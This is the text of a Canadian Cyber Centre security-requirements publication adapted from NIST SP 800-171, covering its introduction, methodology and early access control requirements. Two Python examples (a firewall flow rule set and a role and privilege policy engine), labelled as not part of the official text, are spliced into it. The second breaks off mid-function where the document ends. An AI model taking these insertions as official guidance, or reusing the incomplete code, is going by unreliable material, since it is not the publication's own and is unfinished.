class="text-info">Foreword</h2> <p>This is an unclassified publication issued under the authority of the Head, Canadian Centre for Cyber Security (Cyber Centre). 
For more information or to suggest amendments, contact the Contact Centre:</p> <ul><li><a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a></li> <li><a href="tel:+16139497048">(613) 949-7048</a> or <span class="nowrap"><a href="tel:+18332923788">1-833-CYBER-88</a></span></li> </ul><h2 class="text-info">Effective date</h2> <p>This publication takes effect on April 2, 2025.</p> <h2 class="text-info">Revision history</h2> <ol><li><strong>First release:</strong> April 2, 2025</li> <li><strong>Second release:</strong> October 28, 2025</li> </ol><section><h2 class="text-info">Table of contents</h2> <ul class="list-unstyled lst-spcd"><li><a href="#1">1 Introduction</a> <ul class="lst-none"><li><a href="#1-1">1.1 Purpose</a></li> <li><a href="#1-2">1.2 Audience</a></li> <li><a href="#1-3">1.3 Publication organization</a></li> </ul></li> <li><a href="#2">2 Fundamentals</a> <ul class="lst-none"><li><a href="#2-1">2.1 Security requirements assumptions</a></li> <li><a href="#2-2">2.2 Security requirement development methodology</a></li> </ul></li> <li><a href="#3">3 Requirements</a> <ul class="lst-none"><li><a href="#3-1">3.1 Access control</a></li> <li><a href="#3-2">3.2 Awareness and training</a></li> <li><a href="#3-3">3.3 Audit and accountability</a></li> <li><a href="#3-4">3.4 Configuration management</a></li> <li><a href="#3-5">3.5 Identification and authentication</a></li> <li><a href="#3-6">3.6 Incident response</a></li> <li><a href="#3-7">3.7 Maintenance</a></li> <li><a href="#3-8">3.8 Media protection</a></li> <li><a href="#3-9">3.9 Personnel security</a></li> <li><a href="#3-10">3.10 Physical protection</a></li> <li><a href="#3-11">3.11 Risk assessment</a></li> <li><a href="#3-12">3.12 Security assessment and monitoring</a></li> <li><a href="#3-13">3.13 System and communications protection</a></li> <li><a href="#3-14">3.14 System and information integrity</a></li> <li><a href="#3-15">3.15 Planning</a></li> <li><a href="#3-16">3.16 System and services 
acquisition</a></li> <li><a href="#3-17">3.17 Supply chain risk management</a></li> </ul></li> <li><a href="#AA">Annex A Tailoring criteria</a></li> <li><a href="#AB">Annex B Organization-defined parameters</a></li> </ul></section><section><h2 class="text-info">Overview</h2> <p>Protecting specified information is of paramount importance to Government of Canada (GC) departments and agencies and can directly impact the <abbr title="Government of Canada">GC</abbr>’s ability to successfully conduct its essential missions and functions. This publication provides <abbr title="Government of Canada">GC</abbr> departments and agencies with recommended security requirements for protecting the confidentiality of specified information when it resides in non-<abbr title="Government of Canada">GC</abbr> systems and organizations. These requirements apply to the components of non-<abbr title="Government of Canada">GC</abbr> systems that handle, process, store or transmit specified information, or that provide protection for such components. The security requirements are intended for use by <abbr title="Government of Canada">GC</abbr> departments and agencies in contractual vehicles or other agreements established between those departments and agencies and non-<abbr title="Government of Canada">GC</abbr> organizations.</p> <p>This publication is a Canadian version of the National Institute of Standards and Technology <a href="https://csrc.nist.gov/pubs/sp/800/171/r3/final">NIST SP 800-171 Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations</a>. The Cyber Centre will produce a companion publication to use in conjunction with this publication, based on <a href="https://csrc.nist.gov/pubs/sp/800/171/a/r3/final">NIST SP 800-171A Assessing Security Requirements for Controlled Unclassified Information</a>. That publication will provide a comprehensive set of procedures to assess the security requirements. 
In the interim, NIST SP 800-171A can be used as a reference.</p> <h2 class="text-info">Acknowledgments</h2> <p>The Cyber Centre wishes to acknowledge and thank Dr. Ron Ross and Victoria Pillitteri from the Computer Security Division at <abbr title="National Institute of Standards and Technology">NIST</abbr> for allowing the Cyber Security Guidance (CSG) team to use their guidance and modify it to the Canadian context.</p> </section><section><h2 class="text-info" id="1">1 Introduction</h2> <p>This publication is a Canadian version of <a href="https://csrc.nist.gov/pubs/sp/800/171/r3/final">NIST SP 800-171 Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations</a>. There are no substantial technical changes between this publication and NIST SP 800-171. The primary modifications arise from differences in laws, policies, directives, standards and guidelines. In other words, the changes reflect the distinct Canadian regulatory and compliance landscape; there are no changes to the underlying technical context.</p> <p>The controls are aligned with Security and privacy controls and assurance activities catalogue (ITSP.10.033), which is a version of <a href="https://csrc.nist.gov/pubs/sp/800/53/r5/upd1/final">NIST SP 800-53 Rev. 5 Security and Privacy Controls for Information Systems and Organizations</a> adapted to the Canadian context.</p> <p><strong>Specified information</strong> includes any information, other than classified, that a GC authority identifies and qualifies in a contract as requiring safeguarding. 
Protected information, as well as the safeguarding and dissemination requirements for such information, is defined by the Treasury Board of Canada Secretariat <a href="https://www.tbs-sct.canada.ca/pol/doc-eng.aspx?id=32614"><abbr title="Treasury Board Secretariat">TBS</abbr> Directive on Security Management, Appendix J: Standard on Security Categorization</a> and is codified in the <a href="https://www.tbs-sct.canada.ca/pol/doc-eng.aspx?id=12510"><abbr title="Treasury Board Secretariat">TBS</abbr> Policy on Privacy Protection</a>. We use the term “specified information” in place of “controlled unclassified information” (CUI), which is used in the US document.</p> <p>GC departments and agencies are required to follow the policies and directives published by <abbr title="Treasury Board Secretariat">TBS</abbr> when using federal systems to handle, process, store, or transmit information<sup id="fn1-rf"><a class="fn-lnk" href="#fn1"><span class="wb-inv">Footnote </span>1</a></sup>.</p> <p>The responsibility of <abbr title="Government of Canada">GC</abbr> departments and agencies to protect specified information remains the same when sharing it with non-<abbr title="Government of Canada">GC</abbr> organizations. Therefore, a similar level of protection is needed when non-<abbr title="Government of Canada">GC</abbr> organizations using non-<abbr title="Government of Canada">GC</abbr> systems handle, process, store or transmit specified information. 
To maintain a consistent level of protection, the security requirements for safeguarding specified information in non-<abbr title="Government of Canada">GC</abbr> systems and organizations must comply with the <a href="https://www.tbs-sct.canada.ca/pol/doc-eng.aspx?id=16578"><abbr title="Treasury Board Secretariat">TBS</abbr> Policy on Government Security</a>, <a href="https://www.tbs-sct.canada.ca/pol/doc-eng.aspx?id=32603"><abbr title="Treasury Board Secretariat">TBS</abbr> Policy on Service and Digital</a>, and <abbr title="Treasury Board Secretariat">TBS</abbr> Policy on Privacy Protection.</p> <p>The security controls and activities presented in this publication outline requirements for federal contracting.</p> <p>This publication does not contain the complete set of privacy-related controls and activities described in ITSP.10.033. Rather, it contains a subset of privacy-related controls that are shared with confidentiality-related controls.</p> <h3 class="h2 mrgn-tp-lg" id="1-1">1.1 Purpose</h3> <p>This publication provides <abbr title="Government of Canada">GC</abbr> departments and agencies with recommended security requirements for protecting the confidentiality of specified information when it resides in non-<abbr title="Government of Canada">GC</abbr> systems and organizations and where there are no specific safeguarding requirements prescribed by the authorizing law, regulation, or government-wide policy for the specified information category.</p> <p>The security requirements in this publication are only applicable to components<sup id="fn2-rf"><a class="fn-lnk" href="#fn2"><span class="wb-inv">Footnote </span>2</a></sup> of non-<abbr title="Government of Canada">GC</abbr> systems that handle, process, store, or transmit specified information <strong>or</strong> that provide protection for such components. 
The requirements are intended to be used by <abbr title="Government of Canada">GC</abbr> departments and agencies in contractual vehicles or other agreements established with non-<abbr title="Government of Canada">GC</abbr> organizations.</p> <p>It is important that non-<abbr title="Government of Canada">GC</abbr> organizations scope requirements appropriately when making protection-related investment decisions and managing security risks. By designating system components for handling, processing, storing or transmitting specified information, non-<abbr title="Government of Canada">GC</abbr> organizations can limit the scope of the security requirements by isolating the system components in a separate security domain. Isolation can be achieved by applying architectural and design concepts (e.g., implementing subnetworks with firewalls or other boundary protection devices and using information flow control mechanisms). Security domains can use physical separation, logical separation, or a combination of both. 
This approach can provide adequate security for specified information and avoid increasing the non-<abbr title="Government of Canada">GC</abbr> organization’s security posture beyond what it requires for protecting its missions, operations and assets.</p> <h3 class="h2 mrgn-tp-lg" id="1-2">1.2 Audience</h3> <p>This publication is intended for various individuals and organizations in the public and private sectors, including:</p> <ul><li><abbr title="Government of Canada">GC</abbr> departments and agencies responsible for managing and protecting specified information</li> <li>non-<abbr title="Government of Canada">GC</abbr> organizations responsible for protecting specified information</li> <li>individuals with system development lifecycle (SDLC) responsibilities</li> <li>individuals with acquisition or procurement responsibilities</li> <li>individuals with system, security, privacy or risk management and oversight responsibilities</li> <li>individuals with security or privacy assessment and monitoring responsibilities</li> </ul><h3 class="h2 mrgn-tp-lg" id="1-3">1.3 Publication organization</h3> <p>The remainder of this publication is organized as follows:</p> <ul><li><a href="#2">Section 2 Fundamentals</a> describes the assumptions and methodology used to develop the security requirements for protecting the confidentiality of specified information, the format of the requirements, and the tailoring criteria applied to the Cyber Centre guidelines to obtain the requirements</li> <li><a href="#3">Section 3 Requirements</a> lists the security requirements for protecting the confidentiality of specified information in non-<abbr title="Government of Canada">GC</abbr> systems and organizations</li> </ul><p>The following sections provide additional information to support the protection of specified information:</p> <ul><li><a href="#AA">Annex A: Tailoring criteria</a></li> <li><a href="#AB">Annex B: Organization-defined parameters</a></li> </ul></section>
<section><h2 class="text-info" id="2">2 Fundamentals</h2> <p>This section describes the assumptions and methodology used to develop the requirements to protect the confidentiality of specified information in non-<abbr title="Government of Canada">GC</abbr> systems and organizations. It also includes the tailoring criteria applied to the controls in ITSP.10.033.</p> <h3 class="h2 mrgn-tp-lg" id="2-1">2.1 Security requirements assumptions</h3> <p>The security requirements in this publication are based on the following assumptions:</p> <ul><li><abbr title="Government of Canada">GC</abbr> information designated as specified information has the same value regardless of whether such information resides in a <abbr title="Government of Canada">GC</abbr> or a non-<abbr title="Government of Canada">GC</abbr> system or organization</li> <li>statutory and regulatory requirements for the protection of specified information are consistent in <abbr title="Government of Canada">GC</abbr> and non-<abbr title="Government of Canada">GC</abbr> systems and organizations</li> <li>safeguards implemented to protect specified information are consistent in <abbr title="Government of Canada">GC</abbr> and non-<abbr title="Government of Canada">GC</abbr> systems and organizations</li> <li>the confidentiality impact value for specified information is no less than low (Protected A), but will be medium for most large <abbr title="Government of Canada">GC</abbr> datasets</li> <li>non-<abbr title="Government of Canada">GC</abbr> organizations can directly implement a variety of potential security solutions or use external service providers to satisfy security requirements</li> </ul><h3 class="h2 mrgn-tp-lg" id="2-2">2.2 Security requirement development 
methodology</h3> <p>Starting with the ITSP.10.033 controls in the ITSP.10.033-01 Medium impact profile, the controls are tailored to eliminate selected controls or parts of controls that are:</p> <ul><li>primarily the responsibility of the <abbr title="Government of Canada">GC</abbr></li> <li>not directly related to protecting the confidentiality of specified information</li> <li>adequately addressed by other related controls</li> <li>not applicable</li> </ul><p>ITSP.10.171 security requirements represent a subset of the controls that are necessary to protect the confidentiality of specified information. The security requirements are organized into 17 families, as illustrated in Table 1. Each family contains the requirements related to its general security topic. Certain families from ITSP.10.033 are not included because they do not directly contribute to confidentiality. For example, the Personal information handling and transparency (PT) family is not included because it is about handling personal information (PI), not about the confidentiality of the <abbr title="personal information">PI</abbr>. The Program management (PM) family is not included because it is not related to confidentiality. 
Finally, the Contingency planning (CP) family is not included because it addresses availability.</p> <p>The following are the security requirements families:</p> <ul><li>Access control</li> <li>Awareness and training</li> <li>Audit and accountability</li> <li>Configuration management</li> <li>Identification and authentication</li> <li>Incident response</li> <li>Maintenance</li> <li>Media protection</li> <li>Personnel security</li> <li>Physical protection</li> <li>Risk assessment</li> <li>Security assessment and monitoring</li> <li>System and communications protection</li> <li>System and information integrity</li> <li>Planning</li> <li>System and services acquisition</li> <li>Supply chain risk management</li> </ul><p>Organization-defined parameters (ODPs) are included in certain security requirements. <abbr title="organization-defined parameter">ODP</abbr>s provide flexibility through the use of assignment and selection operations to allow <abbr title="Government of Canada">GC</abbr> departments and agencies and non-<abbr title="Government of Canada">GC</abbr> organizations to specify values for the designated parameters in the requirements. Assignment and selection operations allow security requirements to be customized based on specific protection needs. The determination of <abbr title="organization-defined parameter">ODP</abbr> values can be guided and informed by laws, Orders in Council, directives, regulations, policies, standards, guidance, or mission and business needs. Once specified, <abbr title="organization-defined parameter">ODP</abbr> values become part of the requirement. When present in a control or activity statement, the square brackets indicate that there is an <abbr title="organization-defined parameter">ODP</abbr> that needs to be inserted by the reader in order for an organization to tailor the control to their context.</p> <p><abbr title="organization-defined parameter">ODP</abbr>s are an important part of specifying a security requirement. 
<abbr title="organization-defined parameter">ODP</abbr>s provide both the flexibility and the specificity needed by organizations to clearly define their security requirements according to their particular missions, business functions, operational environments and risk tolerance. In addition, <abbr title="organization-defined parameter">ODP</abbr>s support consistent security assessments to determine if specified security requirements have been satisfied. If a <abbr title="Government of Canada">GC</abbr> department or agency, or a group of departments or agencies, does not specify a particular value or range of values for an <abbr title="organization-defined parameter">ODP</abbr>, non-<abbr title="Government of Canada">GC</abbr> organizations must assign the value or values to complete the security requirement.</p> <p>Each requirement includes a discussion section, derived from the control discussion sections in NIST SP 800-53. These sections provide additional information to facilitate the implementation and assessment of the requirements. They are informative, not normative. The discussion sections are not intended to extend the scope of a requirement or to influence the solutions that organizations may use to satisfy a requirement. Examples provided are notional, not exhaustive, and do not reflect all the potential options available to organizations. 
The “References” section provides the source controls or assurance activities from ITSP.10.033, and a list of relevant publications with additional information on the topic described in the requirement.</p> <p>Because this is the first iteration of the Canadian publication, controls that were withdrawn in NIST SP 800-171 Revision 3 have been labelled as “not allocated” to keep the same numbering for interoperability purposes.</p> <p>The structure and content of a typical security requirement is provided in the example below.</p> <p>The term “organization” is used in many security requirements, and its meaning depends on context. For example, in a security requirement with an <abbr title="organization-defined parameter">ODP</abbr>, an organization can refer to either the <abbr title="Government of Canada">GC</abbr> department or agency or to the non-<abbr title="Government of Canada">GC</abbr> organization establishing the parameter values for the requirement.</p> <p>Annex A describes the security control tailoring criteria used to develop the security requirements and the results of the tailoring process. It provides a list of controls and activities from ITSP.10.033 that support the requirements and the controls and activities that have been eliminated from the Medium impact profile in accordance with the tailoring criteria.</p> </section><section><h2 class="text-info" id="3">3 Requirements</h2> <p>This section describes 17 families of security requirements for protecting the confidentiality of specified information in non-<abbr title="Government of Canada">GC</abbr> systems and organizations. 
In this section, the term “system” refers to non-<abbr title="Government of Canada">GC</abbr> systems or system components that handle, process, store or transmit specified information, or that provide protection for such systems or components. Not all security requirements mention specified information explicitly. Requirements that do not mention specified information explicitly are included because they directly affect the protection of specified information during its processing, storage or transmission.</p> <p>There may be limitations to how some systems, including specialized systems (e.g., industrial/process control systems, medical devices, or computer numerical control machines) can apply certain security requirements. To accommodate such issues, the system security plan — as reflected in requirement <a href="#03-15-02">System security plan 03.15.02</a> — is used to describe any enduring exceptions to the security requirements. Plans of action and milestones are used to manage individual, isolated or temporary deficiencies, as reflected in requirement <a href="#03-12-02">Plan of action and milestones 03.12.02</a>.</p> <p>The security requirements in this section are only applicable to components of non-<abbr title="Government of Canada">GC</abbr> systems that process, store or transmit specified information or that provide protection for such components.</p> <section><h3 class="h2 mrgn-tp-lg" id="3-1">3.1 Access control</h3> <p>The controls in the Access control family support the ability to permit or deny user access to resources within the system.</p> 
<details><summary><h4 id="03-01-01">03.01.01 Account management</h4> </summary><ol class="lst-upr-alph"><li>Define the types of system accounts allowed and prohibited.</li> <li>Create, enable, modify, disable, and remove system accounts in accordance with organizational policy, procedures, prerequisites, and criteria.</li> <li>Specify: <ol><li>authorized users of the system</li> <li>group and role membership</li> <li>access authorizations (i.e., privileges) for each account</li> </ol></li> <li>Authorize access to the system based on: <ol><li>a valid access authorization</li> <li>intended system usage</li> </ol></li> <li>Monitor the use of system accounts</li> <li>Disable system accounts when: <ol><li>the accounts have expired</li> <li>the accounts have been inactive for [Assignment: organization-defined time period]</li> <li>the accounts are no longer associated with a user or individual</li> <li>the accounts are 
in violation of organizational policy</li> <li>significant risks associated with individuals are discovered</li> </ol></li> <li>Notify account managers and designated personnel or roles within: <ol><li>[Assignment: organization-defined time period] when accounts are no longer required</li> <li>[Assignment: organization-defined time period] when users are terminated or transferred</li> <li>[Assignment: organization-defined time period] when system usage or the need-to-know changes for an individual</li> </ol></li> <li>Require that users log out of the system after [Assignment: organization-defined time period] of expected inactivity or when [Assignment: organization-defined circumstances].</li> </ol><h5>Discussion</h5> <p>This requirement focuses on account management for systems and applications. The definition and enforcement of access authorizations other than those determined by account type (e.g., privileged access or non-privileged access) are addressed in <a href="#03-01-02">Access enforcement 03.01.02</a>. System account types include individual, group, temporary, system, guest, anonymous, emergency, developer, and service accounts. Users who require administrative privileges on system accounts receive additional scrutiny by organizational personnel responsible for approving such accounts and privileged access. Types of accounts that organizations may prohibit due to increased risk include group, emergency, guest, anonymous, and temporary accounts.</p> <p>Organizations may choose to define access privileges or other attributes by account, type of account, or a combination of both. Other attributes required for authorizing access include restrictions on time-of-day, day-of-week, and point of origin. 
In defining other account attributes, organizations consider system requirements (e.g., system upgrades, scheduled maintenance) and mission and business requirements (e.g., time zone differences, remote access to facilitate travel requirements).</p> <p>Users who pose a significant security and/or privacy risk include individuals for whom reliable evidence indicates either the intention to use authorized access to the system to cause harm or that adversaries will cause harm through them. Close coordination among human resource managers, mission/business owners, system administrators, and legal staff is essential when disabling system accounts for high-risk individuals. Time periods for the notification of organizational personnel or roles may vary.</p> <p>Inactivity logout is behaviour- or policy-based and requires users to take physical action to log out when they are expecting inactivity longer than the defined period. Automatic enforcement of inactivity logout is addressed by <a href="#03-01-10">Device lock 03.01.10</a>.</p> <h5>References</h5> <p>Source controls: AC-02, AC-02(03), AC-02(05), AC-02(13)<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/managing-and-controlling-administrative-privileges-itsap10094">Cyber Centre Managing and controlling administrative privileges (ITSAP.10.094) </a></li> <li><a href="/en/guidance/how-protect-your-organization-insider-threats-itsap10003-0">Cyber Centre How to protect your organization from insider threats (ITSAP.10.003) </a></li> </ul></details><details><summary><h4 id="03-01-02">03.01.02 Access enforcement</h4> </summary><p>Enforce approved authorizations for logical access to specified information and system resources in accordance with applicable access control policies.</p> <h5>Discussion</h5> <p>Access control policies control access between active entities or subjects (i.e., users or system processes acting on behalf of users) and passive entities or objects (i.e., devices, files, records, and 
domains) in organizational systems. Types of system access include remote access and access to systems that communicate through external networks, such as the Internet. Access enforcement mechanisms can also be employed at the application and service levels to provide increased protection for specified information. This recognizes that the system can host many applications and services in support of mission and business functions. Access control policies are defined in Policy and procedures 03.15.01.</p> <h5>References</h5> <p>Source control: AC-03<br /> Supporting publications: <a href="/en/guidance/managing-and-controlling-administrative-privileges-itsap10094">Cyber Centre Managing and controlling administrative privileges (ITSAP.10.094)</a></p> </details><details><summary><h4 id="03-01-03">03.01.03 Information flow enforcement</h4> </summary><p>Enforce approved authorizations for controlling the flow of specified information within the system and between connected systems.</p> <h5>Discussion</h5> <p>Information flow control regulates where specified information can transit within a system and between systems (versus who can access the information) and without explicit regard to subsequent accesses to that information. Flow control restrictions include keeping specified information from being transmitted in the clear to the Internet, blocking outside traffic that claims to be from within the organization, restricting requests to the Internet that are not from the internal web proxy server, and limiting specified information transfers between organizations based on data structures and content.</p> <p>Organizations commonly use information flow control policies and enforcement mechanisms to control the flow of specified information between designated sources and destinations (e.g., networks, individuals, and devices) within systems and between interconnected systems. Flow control is based on characteristics of the information or the information path. 
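The flow control restrictions listed above (no specified information in the clear to the Internet, no outside traffic claiming an internal source, Internet requests only from the internal web proxy) are the kind of rule set a boundary device enforces on header information. The following is an added example, not part of the Cyber Centre text or any particular product: an ordered, first-match rule set evaluated over constructed packet headers. The address ranges, the proxy and public web hosts, and the `label` attribute standing in for the information's sensitivity are assumptions chosen for illustration; the documentation ranges 203.0.113.0/24 and 198.51.100.0/24 stand in for the Internet.

```python
# Added example, not part of the Cyber Centre text: a header-based information flow
# rule set of the kind 03.01.03 describes, evaluated over constructed packet headers.
# Network ranges, host addresses and the "label" attribute are assumptions.
import ipaddress
from dataclasses import dataclass

INTERNAL = ipaddress.ip_network("10.0.0.0/8")    # organization's address space (constructed)
WEB_PROXY = ipaddress.ip_address("10.0.1.5")      # only host allowed to browse outward (constructed)
PUBLIC_WEB = ipaddress.ip_address("10.0.2.2")     # externally reachable web front end (constructed)
CLEARTEXT_PORTS = {21, 23, 80}                    # protocols that carry data in the clear


@dataclass(frozen=True)
class Packet:
    """Header fields a boundary device can see, plus the information label that
    flow control (as opposed to access control) keys on."""
    src: str
    dst: str
    dport: int
    ingress: str   # interface the packet arrived on: "outside" or "inside"
    label: str     # sensitivity of the payload: "specified" or "public"


# Ordered rule set: first match wins; anything unmatched falls to default deny.
# Each predicate receives the packet and its parsed source/destination addresses.
RULES = [
    # Outside traffic that claims an internal source is spoofed.
    ("anti-spoof", "drop",
     lambda p, s, d: p.ingress == "outside" and s in INTERNAL),
    # Specified information must never leave the organization in the clear.
    ("no-cleartext-specified", "drop",
     lambda p, s, d: p.label == "specified" and d not in INTERNAL and p.dport in CLEARTEXT_PORTS),
    # Internet web requests must originate from the internal web proxy.
    ("proxy-only-web", "drop",
     lambda p, s, d: d not in INTERNAL and p.dport in (80, 443) and s != WEB_PROXY),
    ("permit-proxy-web", "permit",
     lambda p, s, d: s == WEB_PROXY and d not in INTERNAL and p.dport in (80, 443)),
    ("permit-internal", "permit",
     lambda p, s, d: s in INTERNAL and d in INTERNAL),
    ("permit-inbound-https", "permit",
     lambda p, s, d: p.ingress == "outside" and d == PUBLIC_WEB and p.dport == 443),
]


def evaluate(pkt: Packet) -> tuple[str, str]:
    """Return (action, name of the rule that decided) for one packet header."""
    src, dst = ipaddress.ip_address(pkt.src), ipaddress.ip_address(pkt.dst)
    for name, action, matches in RULES:
        if matches(pkt, src, dst):
            return action, name
    return "drop", "default-deny"


def evaluate_all(pkts):
    return [evaluate(p) for p in pkts]


SAMPLE = [  # constructed headers exercising each rule
    Packet("10.0.5.9", "10.0.5.10", 445, "inside", "public"),
    Packet("10.0.7.7", "203.0.113.10", 443, "inside", "public"),
    Packet("10.0.1.5", "203.0.113.10", 443, "inside", "public"),
    Packet("10.0.1.5", "203.0.113.10", 80, "inside", "specified"),
    Packet("10.0.9.9", "10.0.1.5", 443, "outside", "public"),
    Packet("198.51.100.4", "10.0.2.2", 443, "outside", "public"),
    Packet("198.51.100.4", "10.0.5.10", 22, "outside", "public"),
]

if __name__ == "__main__":
    for pkt, (action, rule) in zip(SAMPLE, evaluate_all(SAMPLE)):
        print(f"{action:6} {rule:24} {pkt.src} -> {pkt.dst}:{pkt.dport} "
              f"({pkt.ingress}, {pkt.label})")
```

Rule order matters: the cleartext rule sits before the proxy permit so that even the proxy cannot send labelled information over an unencrypted protocol, and the default at the end is deny, which is what makes the permit rules the complete statement of approved flows.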
Enforcement occurs in boundary protection devices (e.g., encrypted tunnels, routers, gateways, and firewalls) that use rule sets or establish configuration settings that restrict system services, provide a packet-filtering capability based on header information, or provide a message-filtering capability based on message content (e.g., implementing key word searches or using document characteristics). Organizations also consider the trustworthiness of filtering and inspection mechanisms (i.e., hardware, firmware, and software components) that are critical to information flow enforcement.</p> <p>Transferring specified information between organizations may require an agreement that specifies how the information flow is enforced (see <a href="#03-12-05">Information exchange 03.12.05</a>). Transferring specified information between systems that represent different security domains with different security policies introduces the risk that such transfers may violate one or more domain security policies. In such situations, information custodians provide guidance at designated policy enforcement points between interconnected systems. Organizations consider mandating specific architectural solutions when required to enforce specific security policies. 
Enforcement includes prohibiting specified information transfers between interconnected systems (i.e., allowing information access only), employing hardware mechanisms to enforce one-way information flows, and implementing trustworthy regrading mechanisms to reassign security attributes and security labels.</p> <h5>References</h5> <p>Source control: AC-04<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/baseline-security-requirements-network-security-zones-version-20-itsp80022">Cyber Centre Baseline Security Requirements for Network Security Zones (ITSP.80.022) </a></li> <li><a href="/en/guidance/it-media-sanitization-itsp40006">Cyber Centre <abbr title="information technology">IT</abbr> media sanitization (ITSP.40.006) </a></li> </ul></details><details><summary><h4 id="03-01-04">03.01.04 Separation of duties</h4> </summary><ol class="lst-upr-alph"><li>Identify the duties of individuals requiring separation.</li> <li>Define system access authorizations to support separation of duties.</li> </ol><h5>Discussion</h5> <p>Separation of duties addresses the potential for abuse of authorized privileges and reduces the risk of malicious activity without collusion. Separation of duties includes dividing mission functions and support functions among different individuals or roles, conducting system support functions with different individuals or roles (e.g., quality assurance, configuration management, system management, assessments, programming, and network security), and ensuring that personnel who administer access control functions do not also administer audit functions. Because separation of duty violations can span systems and application domains, organizations consider the entirety of their systems and system components when developing policies on separation of duties. 
This requirement is enforced by <a href="#03-01-02">Access enforcement 03.01.02</a>.</p> <h5>References</h5> <p>Source control: AC-05<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/162/upd2/final">NIST SP 800-162 Guide to Attribute Based Access Control (ABAC) Definition and Considerations </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/178/final">NIST SP 800-178 A Comparison of Attribute Based Access Control (ABAC) Standards for Data Service Applications: Extensible Access Control Markup Language (XACML) and Next Generation Access Control (NGAC) </a></li> </ul></details><details><summary><h4 id="03-01-05">03.01.05 Least privilege</h4> </summary><ol class="lst-upr-alph"><li>Allow only the authorized system access for users (or processes acting on behalf of users) that is necessary to accomplish assigned organizational tasks.</li> <li>Authorize access to [Assignment: organization-defined security functions] and [Assignment: organization-defined security-relevant information].</li> <li>Review the privileges assigned to roles or classes of users [Assignment: organization-defined frequency] to validate the need for such privileges.</li> <li>Reassign or remove privileges, as necessary.</li> </ol><h5>Discussion</h5> <p>Organizations employ the principle of least privilege for specific duties and authorized access for users and system processes. Least privilege is applied to the development, implementation, and operation of the system. Organizations consider creating additional processes, roles, and system accounts to achieve least privilege. Security functions include establishing system accounts and assigning privileges, installing software, configuring access authorizations, configuring settings for events to be audited, establishing vulnerability scanning parameters, establishing intrusion detection parameters, and managing audit information. 
Security-relevant information includes threat and vulnerability information, filtering rules for routers or firewalls, configuration parameters for security services, security architecture, cryptographic key management information, access control lists, and audit information.</p> <h5>References</h5> <p>Source controls: AC-06, AC-06(01), AC-06(07), AU-09(04)<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-01-06">03.01.06 Least privilege – privileged accounts</h4> </summary><ol class="lst-upr-alph"><li>Restrict privileged accounts on the system to [Assignment: organization-defined personnel or roles].</li> <li>Require that users (or roles) with privileged accounts use non-privileged accounts when accessing non-security functions or non-security information.</li> <li>Require any administrative or superuser actions to be performed from a physical workstation which is dedicated to those specific tasks and isolated from all other functions and networks, especially any form of Internet access.</li> </ol><h5>Discussion</h5> <p>Privileged accounts refer to accounts that are granted elevated privileges to access resources (including security functions or security-relevant information) that are otherwise restricted for non-privileged accounts. These accounts are typically described as system administrator or super-user accounts. For example, a privileged account is often required in order to perform privileged functions such as executing commands that could modify system behaviour. Restricting privileged accounts to specific personnel or roles prevents non-privileged users from accessing security functions or security-relevant information. 
Requiring the use of non-privileged accounts when accessing non-security functions or non-security information limits exposure when operating from within privileged accounts.</p> <p>A dedicated administration workstation (DAW) typically comprises a user terminal with a very small selection of software designed for interfacing with the target system. For the purpose of this control, workstation refers to the system from which the administration is performed, as opposed to the target system of administration.</p> <h5>References</h5> <p>Source controls: AC-06(02), AC-06(05), SI-400<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-01-07">03.01.07 Least privilege – privileged functions</h4> </summary><ol class="lst-upr-alph"><li>Prevent non-privileged users from executing privileged functions.</li> <li>Log the execution of privileged functions.</li> </ol><h5>Discussion</h5> <p>Privileged functions include establishing system accounts, performing system integrity checks, conducting patching operations, or administering cryptographic key management activities. Non-privileged users do not possess the authorizations to execute privileged functions. Bypassing intrusion detection and prevention mechanisms or malicious code protection mechanisms are examples of privileged functions that require protection from non-privileged users. This requirement represents a condition to be achieved by the definition of authorized privileges in <a href="#03-01-01">Account management 03.01.01</a> and privilege enforcement in <a href="#03-01-02">Access enforcement 03.01.02</a>.</p> <p>The misuse of privileged functions – whether intentionally or unintentionally by authorized users or by unauthorized external entities that have compromised system accounts – is a serious and ongoing concern that can have significant adverse impacts on organizations. 
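Access enforcement (03.01.02), separation of duties (03.01.04) and the two halves of this requirement (03.01.07) meet at a single point in an application: the place where an action is authorized, refused or recorded. The following is an added example, not part of the Cyber Centre text or of any product, showing that point in code. The roles, permissions, users and the one conflicting role pair (taken from the separation of duties discussion: access control administration kept apart from audit administration) are constructed sample data.

```python
# Added example, not part of the Cyber Centre text: a small policy-enforcement layer in
# which approved authorizations are enforced at the point of use (03.01.02), conflicting
# roles are kept apart (03.01.04), and every privileged function execution is logged
# (03.01.07). Roles, permissions, users and the conflict pair are constructed sample data.
from __future__ import annotations
from dataclasses import dataclass, field
from typing import Callable

# Role -> permissions (constructed). Permissions use an "object:operation" convention.
ROLE_PERMISSIONS: dict[str, set[str]] = {
    "reader": {"report:read"},
    "access_admin": {"report:read", "account:create", "account:disable"},
    "audit_admin": {"report:read", "audit:read", "audit:configure"},
}

# Privileged functions are named explicitly so that their execution is logged no matter
# who invokes them (03.01.07 b).
PRIVILEGED_FUNCTIONS = {"account:create", "account:disable", "audit:configure"}

# Role pairs a single individual may never hold together (constructed policy).
SOD_CONFLICTS = {frozenset({"access_admin", "audit_admin"})}


class PolicyViolation(Exception):
    pass


def sod_violations(assignments: dict[str, set[str]]) -> list[tuple[str, frozenset[str]]]:
    """Review an existing role table (e.g. one exported from a directory) and return every
    user holding a conflicting pair; suited to the periodic privilege review in 03.01.05."""
    found = []
    for user, roles in assignments.items():
        for pair in SOD_CONFLICTS:
            if pair <= roles:
                found.append((user, pair))
    return found


@dataclass
class PolicyEngine:
    assignments: dict[str, set[str]] = field(default_factory=dict)
    audit_log: list[dict] = field(default_factory=list)

    def assign_role(self, user: str, role: str) -> None:
        """Grant a role unless it would combine with one the user already holds."""
        if role not in ROLE_PERMISSIONS:
            raise PolicyViolation(f"unknown role {role!r}")
        for other in self.assignments.get(user, set()):
            if frozenset({other, role}) in SOD_CONFLICTS:
                raise PolicyViolation(
                    f"{user}: {role} conflicts with {other} (separation of duties)")
        self.assignments.setdefault(user, set()).add(role)

    def permissions(self, user: str) -> set[str]:
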